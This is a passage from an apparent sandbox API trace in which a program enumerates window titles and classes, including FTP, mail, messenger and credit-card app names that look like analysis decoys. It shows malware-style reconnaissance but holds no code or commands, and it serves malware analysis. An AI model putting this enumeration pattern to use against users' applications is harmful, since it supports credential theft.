| out: lpString="Winscp") returned 6 [0119.865] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0119.865] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0119.865] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0119.865] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0119.866] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0119.866] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0119.866] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0119.866] GetWindowTextW (in: hWnd=0x102da, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0119.867] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0119.867] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0119.867] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0119.867] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0119.867] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0119.867] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0119.867] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0119.867] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0119.868] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0119.868] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0119.868] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0119.868] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0119.868] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0119.868] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Fling") returned 5 [0119.868] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0119.868] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0119.868] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0119.869] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0119.869] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0119.869] GetWindowTextW (in: hWnd=0x102de, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0119.869] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0119.869] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0119.870] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0119.870] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0119.870] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0119.870] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Icq") returned 3 [0119.870] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0119.870] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Skype") returned 5 [0119.871] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0119.871] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0119.871] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0119.871] GetWindowTextW (in: hWnd=0x20214, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.872] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0119.872] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0119.873] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0119.873] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0119.873] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0119.873] GetWindowTextW (in: hWnd=0x10268, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Serve") returned 5 [0119.873] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0119.873] GetWindowTextW (in: hWnd=0x10260, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0119.873] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0119.873] GetWindowTextW (in: hWnd=0x10266, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Camera") returned 6 [0119.874] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0119.874] GetWindowTextW (in: hWnd=0x10262, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0119.874] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0119.874] GetWindowTextW (in: hWnd=0x10264, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Move") returned 4 [0119.875] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0119.875] GetWindowTextW (in: hWnd=0x40200, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0119.875] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0119.875] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0119.876] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0119.876] GetWindowTextW (in: hWnd=0x10244, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0119.876] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0119.876] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Clear") returned 5 [0119.876] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0119.876] GetWindowTextW (in: hWnd=0x10222, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Watch") returned 5 [0119.876] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0119.876] GetWindowTextW (in: hWnd=0x10230, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Who South") returned 9 [0119.877] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0119.877] GetWindowTextW (in: hWnd=0x10226, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0119.877] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0119.877] GetWindowTextW (in: hWnd=0x10218, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0119.877] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0119.877] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Drop") returned 4 [0119.877] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0119.878] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="That But") returned 8 [0119.878] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0119.878] GetWindowTextW (in: hWnd=0x10206, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Claim") returned 5 [0119.878] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0119.878] GetWindowTextW (in: hWnd=0x10204, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0119.878] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0119.878] GetWindowTextW (in: hWnd=0x30122, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.878] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.879] GetWindowTextW (in: hWnd=0x30036, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.879] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.879] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.879] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.879] GetWindowTextW (in: hWnd=0x30070, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.879] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.879] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0119.880] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0119.881] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.881] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.881] GetWindowTextW (in: hWnd=0x30288, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.882] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.882] GetWindowTextW (in: hWnd=0x30126, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0119.883] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0119.883] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.883] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0119.884] GetWindowTextW (in: hWnd=0x20084, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.884] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0119.884] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.884] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.884] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.884] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.885] GetWindowTextW (in: hWnd=0x101be, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.885] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0119.885] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.885] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.885] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0119.885] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0119.886] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.886] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.886] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0119.890] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0119.890] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0119.890] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0119.890] GetWindowTextW (in: hWnd=0x10110, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.890] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.890] GetWindowTextW (in: hWnd=0x10118, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.890] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0119.890] GetWindowTextW (in: hWnd=0x20152, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.891] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.891] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.891] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.891] GetWindowTextW (in: hWnd=0x10116, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.892] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0119.892] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.892] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0119.892] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.892] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.892] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0119.893] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0119.893] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0119.893] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0119.893] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.893] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0119.893] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.893] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.894] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.894] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.894] GetWindowTextW (in: hWnd=0x200da, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.894] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.894] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.894] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0119.895] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.895] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0119.895] GetWindowTextW (in: hWnd=0x20040, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0119.895] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0119.895] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0119.896] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0119.896] GetWindowTextW (in: hWnd=0x20030, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0119.896] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0119.896] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.896] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0119.896] GetWindowTextW (in: hWnd=0x40038, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.896] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.896] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.897] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.897] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.897] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0119.897] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.897] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0119.897] GetWindowTextW (in: hWnd=0x10078, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.897] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0119.898] GetWindowTextW (in: hWnd=0x10074, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.898] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0119.898] GetWindowTextW (in: hWnd=0x10022, lpString=0x7deed0, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0119.898] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0119.898] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.898] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0119.898] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0119.898] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0119.899] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0119.899] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0119.899] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.899] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.899] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0119.899] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0119.899] GetWindowTextW (in: hWnd=0x10082, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.899] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.900] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.900] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.900] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.900] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.900] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.900] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.900] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.901] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.901] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.901] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.901] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.901] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.901] GetWindowTextW (in: hWnd=0x20224, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.902] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.902] GetWindowTextW (in: hWnd=0x10398, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.902] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.903] GetWindowTextW (in: hWnd=0x10394, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.903] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.903] GetWindowTextW (in: hWnd=0x10392, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.903] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.903] GetWindowTextW (in: hWnd=0x10390, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.903] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.904] GetWindowTextW (in: hWnd=0x10388, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.904] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.904] GetWindowTextW (in: hWnd=0x10386, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.904] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.904] GetWindowTextW (in: hWnd=0x10384, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.904] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.904] GetWindowTextW (in: hWnd=0x10382, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.905] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.905] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.905] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.905] GetWindowTextW (in: hWnd=0x10380, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.905] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.905] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.905] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.906] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.906] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.906] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0119.906] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0119.906] GetWindowTextW (in: hWnd=0x10378, lpString=0x7deed0, nMaxCount=1024 | 